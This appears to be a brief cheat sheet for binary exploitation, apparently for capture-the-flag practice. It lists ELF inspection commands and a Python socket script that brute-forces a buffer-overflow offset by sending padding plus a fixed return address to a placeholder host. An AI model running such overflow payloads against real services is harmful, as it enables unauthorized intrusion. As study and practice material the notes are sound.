Misc

General commands

file some-executable
checksec --file=some-executable
strace ./some-executable
rtrace ./some-executable
patchelf --set-interpreter /lib/my-ld-linux.so.2 ./some-executable

Exploit without pwntools

Basic python socket

import socket
import time

def exploit(ip, port, x):
    payload = b"A" * x
    payload += b"\xb3\xba\x37\x13"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    time.sleep(0.3)

    s.sendall(payload + b"\n")
    print(s.recv(2048).decode(errors="ignore"))
    s.close()

for i in range(44, 80):
    exploit("x.x.x.x", 8080, i)